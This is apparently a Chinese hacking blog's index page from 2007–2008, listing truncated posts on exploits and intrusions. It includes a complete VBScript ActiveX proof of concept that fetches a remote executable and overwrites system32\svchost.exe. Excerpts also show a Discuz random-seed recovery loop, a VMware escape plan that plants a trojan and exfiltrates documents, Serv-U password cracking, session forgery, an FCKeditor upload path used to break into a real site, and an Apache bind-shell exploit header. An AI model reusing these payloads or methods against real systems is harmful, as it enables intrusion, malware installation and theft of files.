Tlwbw's Blog

文章列表

2008-11-21 17:20

没仔细看大致是这样
漏洞应该是出在 discuzcode.func.php中的 mt_srand((double)microtime() * 1000000);
由这个得到的播种应该是1000000以内的数字

所以可以根据$sid[1]反查出种子
for ($seed = 0; $seed <= 1000000; $seed ++) {
mt_srand($seed);
$id = random(6);
if ($id == $sid[1])
return $seed;
}
return false;
}

discuz中的random
function random($length, $numeric = 0) {
PHP_VERSION < '4.2.0' &&

阅读全文>>

类别：随手笔记 | 评论(3) | 浏览()

Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability

2008-09-10 10:16

<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   dim remURL
   remURL = "http://victim.com/svchost.exe"
   test.Open remURL, True
   test.Save "C:\WINDOWS\system32\svchost.exe", True
 End Sub
</script>

类别：Exploit | 评论(0) | 浏览()

PHP has encountered an Access Violation at 7C94BD02 问题解决

2008-05-15 18:08

记录下

网上看了很多都没搞定最后发现是两个站用一个应用池的问题新建了一个搞定嘿嘿：）

下面是网上的一些解决方法：

PHP has encountered an Access Violation at 7C94BD02 解决方法

先重启一下IIS就能当时解决这个问题!

解决方法如下:

第一种可能：

去掉 php中 eaccelerator 的扩展
这样做能够解决您的问题，不过可能会加重系统负担
因为eaccelerator主要是为了节省

阅读全文>>

类别：随手笔记 | 评论(2) | 浏览()

Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit

2008-04-21 22:53

Exploitable issue in various Adobe products
c0ntex (c0ntexb@gmail.com) Scott Laurie
February 2008

Vulnerable applications, tested:
Adobe Photoshop Album Starter
Adobe After Effects CS3
Adobe Photoshop CS3

Not Vulnerable applications, tested:
Adobe Reader
Adobe Flash Player

This bug is related to the parsing of header images, in that the applications
do not verify that the image header is valid before trying to render it. This
leaves an

阅读全文>>

类别：Exploit | 评论(0) | 浏览()

ms08025

2008-04-14 10:06

Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-04-10

经内部讨论后决定公布分析成果。

4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。成功利用此漏洞的本地攻击者可以完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、Windows Vista 和 Window

阅读全文>>

类别：技术文章 | 评论(0) | 浏览()

vmware exploit

2008-03-17 22:35

http://secunia.com/advisories/29413/

1、首先在那个Vmware共享目录下写一个文件，文件名要唯一；
2、再利用漏洞先写两个文件到真实机，一个是Autorun.inf，一个木马，利用Autorun执行木马。
3、木马运行后首先隐藏自身，在当前运行的盘符下搜索刚刚在Vmware共享目录下建立的唯一文件名，找到这个文件，就找到了真实机与虚拟机之间唯一的锲合点目录，也就成功了一半。
4、全硬盘搜索敏感文件，例如：*.doc，*.txt，*.cpp等，打包压缩复制到有刚才找到的锲合点目录；
5、最后Vmware内的木马将文件读取发走。

阅读全文>>

类别：Exploit | 评论(0) | 浏览()

php注射后的提权

2007-06-04 17:32

By superhei

深挖SERV-U密码
方法一：爆破法．最显眼的要属用户名和密码了，关键是如何破密码呢？到网上搜了一个专门破SERV-U密码的工具（Serv-UPassCrack1.0a.rar），太慢了，这要等到何年何月啊！干脆用记事本打开它的脚本crack.vbs．看看解密原理：假设原来明文密码用"password_mingwen"表示，密文密码也就是我们在ServUDaemon.ini中看到的密码（34位），用"password_miwen"表示,密文的前两位合并上明文，然后

阅读全文>>

类别：技术文章 | 评论(0) | 浏览()

apache 2.0.58 mod rewrite exploit (win32)

2007-05-28 11:26

/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
      original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
      was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/

Usage: ./apach

阅读全文>>

类别：Exploit | 评论(0) | 浏览()

伪造Session登陆后台

2007-05-22 14:41

转：Dany's blog

前不久拿到一个站webshell

发现里面有个站程序还不错..可密码一直找不到..
看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk...

login.asp的验证代码
<% dim user_name,user_password,upwr,uID,ukey,cmd,rs
user_name=trim(request.form("uid"))
user_password=trim(request.form("pwd"))
user_password=jk_md5(user_password,"long")
if

阅读全文>>

类别：技术文章 | 评论(0) | 浏览()

FCKeditor的入侵心得体会

2007-05-21 13:49

转:S e c u r i t y. F a n s. S e c F a n s 's blog

在CN的blog上看到的，感觉这个方法很不错。
晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.
这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用

再入侵的时候,宝发现的心得我记录下:

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打开这个地址就可以上传任何类型的文件了,我和宝上传的是.asa的,在编辑器的目录下

阅读全文>>

类别：技术文章 | 评论(1) | 浏览()